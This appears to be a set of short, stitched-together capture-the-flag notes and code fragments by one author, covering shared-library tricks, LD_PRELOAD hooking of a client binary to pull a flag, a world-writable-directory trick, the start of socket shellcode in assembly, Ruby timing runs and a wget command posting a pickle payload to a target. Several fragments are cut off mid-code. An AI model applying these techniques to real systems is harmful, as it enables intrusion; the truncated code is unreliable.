shinh

// gcc -fPIC -shared z.c -o libz.so
#include <stdio.h>
void func() {
  puts("z");
}

// gcc -fPIC -shared y.c -o liby.so -L. -lz
#include <stdio.h>
void func() {
  puts("y");

shinh

C(a,c,d){asm("syscall"::"a"(a/3),"D"(a%3),"S"(c),"d"(d));}char b[],*p=b;_start(){for(C(0,b,999);;)C(*(int*)(p-2)-'\n42\n'?5:180,p++,1);}

shinh

I didn't want to understand the protocol and how to encrypt password,
so I have just reused the client binary. I injected a few hooks by
LD_PRELOAD and changed the name of user. After the hooked client gets
logged in, the hooked function asks the server to send the encrypted
flag, and asks the original client binary to decode the flag by
jumping to 0x8048c1d.

$ gcc -m32 -std=gnu99 -g -o cl_redirect.so cl_redirect.c -shared -fPIC
$ LD_PRELOAD=./cl_redirect.so ./client_197010ce28dffd35bf00ffc56e3aeb9f XXX.XXX.XXX.XXX

shinh

The attack itself is not interesting at all. You can easily let the
program to execute your shell code.

I know very little CTF history, and I thought the CyberGrandChallenge
thing is specially developed for this CTF. I assumed there will
be a few more problems on this environment so I created a CGC
simulator based on https://github.com/shinh/tel_ldr. This worked
nicely on my Linux box, where my usual tools are available.

As the one more CGC problem (patcher) was fairly easy, this wasn't a

shinh

I used a generic ruby-to-symbolic-ruby converter (gen_hts.rb) to get
the first flag. I used m4 to get the second and third ones
(hts3.rb). As I couldn't come up with the use of $0, I played with the
first server for a while. I've realized /var/lock is world-writable,
so I created "/var/lock/!" whose content is "cat flag".

shinh

$ xxd unreadable

http://shinh.skr.jp/tmp/unreadable.png

shinh

My team found the binary in question was for RISC-V. I just wrote a
translator from objdump output to equations which should be
satisfied. Another team member got the flag with my result and z3.

shinh

BITS 64
        sub rsp, 0x1000

        ;; socket
        mov rdx, 0
        mov rsi, 1
        mov rdi, 2
        mov rax, 41
        syscall

shinh

( '-') time ./miniruby -ve'a=100;i=0;while i<0xffffff;i+=1;a*=557;a+=2;a%=100000;end'
ruby 2.3.0dev (2015-10-26 trunk 52284) [x86_64-linux]
./miniruby -ve'a=100;i=0;while i<0xffffff;i+=1;a*=557;a+=2;a%=100000;end'  0.93s user 0.00s system 99% cpu 0.940 total
( '-') time ./miniruby -ve'a=100;i=0;while i<0xffffff;i+=1;a=(a*557+2)%100000;end'
ruby 2.3.0dev (2015-10-26 trunk 52284) [x86_64-linux]
./miniruby -ve'a=100;i=0;while i<0xffffff;i+=1;a=(a*557+2)%100000;end'  0.83s user 0.00s system 99% cpu 0.834 total
( '-') time ./miniruby -ve'a=100;i=0;while i<0xffffff;i+=1;a*=557;a+=2;a%=100000;end' 2> /dev/null
ruby 2.3.0dev (2015-03-05 rujit 49845) [x86_64-linux]
last_commit=Merge pull request #3 from jserv/rujit
./miniruby -ve'a=100;i=0;while i<0xffffff;i+=1;a*=557;a+=2;a%=100000;end' 2>   0.38s user 0.02s system 97% cpu 0.403 total

shinh

$ python gurke.py && wget --post-file t -O /dev/stdout http://<target-ip>/

It seemed contentstants were supposed to use marshal and base64, but I
didn't need them.